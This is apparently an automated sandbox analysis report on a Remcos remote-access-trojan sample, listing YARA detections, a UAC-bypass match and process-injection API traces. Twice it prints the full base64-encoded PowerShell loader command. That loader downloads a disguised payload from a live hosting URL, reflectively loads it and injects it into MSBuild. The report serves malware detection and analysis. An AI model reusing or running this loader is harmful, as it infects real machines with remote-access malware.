                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7824, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                          Spam, unwanted Advertisements and Ransom Demands

                          barindex
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041BB71 SystemParametersInfoW,7_2_0041BB71
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041BB77 SystemParametersInfoW,7_2_0041BB77

                          System Summary

                          barindex
                          Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                          Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                          Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                          Source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: Process Memory Space: powershell.exe PID: 7360, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Source: Process Memory Space: MSBuild.exe PID: 7824, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: C:\Windows\System32\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}Jump to behavior
                          Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhcmRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$escumar = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($maremma));Invoke-Expression $escumar
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhcmRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$escumar = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($maremma));Invoke-Expression $escumarJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,7_2_00417245
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,7_2_0041ACC1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,7_2_0041ACED
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,8_2_0040DD85
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00401806 NtdllDefWindowProc_W,8_2_00401806
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004018C0 NtdllDefWindowProc_W,8_2_004018C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004016FD NtdllDefWindowProc_A,9_2_004016FD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004017B7 NtdllDefWindowProc_A,9_2_004017B7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00402CAC NtdllDefWindowProc_A,11_2_00402CAC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00402D66 NtdllDefWindowProc_A,11_2_00402D66
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,7_2_004158B9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041D0717_2_0041D071
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004520D27_2_004520D2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0043D0987_2_0043D098
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004371507_2_00437150
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004361AA7_2_004361AA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004262547_2_00426254
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004313777_2_00431377
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0043651C7_2_0043651C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041E5DF7_2_0041E5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0044C7397_2_0044C739
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004367C67_2_004367C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004267CB7_2_004267CB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0043C9DD7_2_0043C9DD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00432A497_2_00432A49
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00436A8D7_2_00436A8D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0043CC0C7_2_0043CC0C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00436D487_2_00436D48
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00434D227_2_00434D22
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00426E737_2_00426E73
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00440E207_2_00440E20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0043CE3B7_2_0043CE3B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00412F457_2_00412F45
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00452F007_2_00452F00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00426FAD7_2_00426FAD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_100171947_2_10017194
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_1000B5C17_2_1000B5C1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0044B0408_2_0044B040
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0043610D8_2_0043610D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004473108_2_00447310
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0044A4908_2_0044A490
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040755A8_2_0040755A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0043C5608_2_0043C560
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0044B6108_2_0044B610
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0044D6C08_2_0044D6C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004476F08_2_004476F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0044B8708_2_0044B870
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0044081D8_2_0044081D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004149578_2_00414957
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004079EE8_2_004079EE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00407AEB8_2_00407AEB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0044AA808_2_0044AA80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00412AA98_2_00412AA9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00404B748_2_00404B74
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00404B038_2_00404B03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0044BBD88_2_0044BBD8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00404BE58_2_00404BE5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00404C768_2_00404C76
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00415CFE8_2_00415CFE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00416D728_2_00416D72
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00446D308_2_00446D30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00446D8B8_2_00446D8B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00406E8F8_2_00406E8F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004050389_2_00405038
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0041208C9_2_0041208C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004050A99_2_004050A9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040511A9_2_0040511A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0043C13A9_2_0043C13A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004051AB9_2_004051AB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004493009_2_00449300
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040D3229_2_0040D322
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0044A4F09_2_0044A4F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0043A5AB9_2_0043A5AB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004136319_2_00413631
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004466909_2_00446690
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0044A7309_2_0044A730
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004398D89_2_004398D8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004498E09_2_004498E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0044A8869_2_0044A886
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0043DA099_2_0043DA09
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00438D5E9_2_00438D5E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00449ED09_2_00449ED0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0041FE839_2_0041FE83
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00430F549_2_00430F54
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_004050C211_2_004050C2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_004014AB11_2_004014AB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0040513311_2_00405133
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_004051A411_2_004051A4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0040124611_2_00401246
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0040CA4611_2_0040CA46
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0040523511_2_00405235
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_004032C811_2_004032C8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0040168911_2_00401689
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00402F6011_2_00402F60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004169A7 appears 87 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004165FF appears 35 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00422297 appears 42 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00401F66 appears 50 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00433FB0 appears 55 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004020E7 appears 40 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0044DB70 appears 41 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00444B5A appears 37 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004338A5 appears 41 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00413025 appears 79 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00416760 appears 69 times
                          Source: Order_DEC2024.wsfInitial sample: Strings found which are bigger than 50
                          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2468
                          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2468Jump to behavior
                          Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
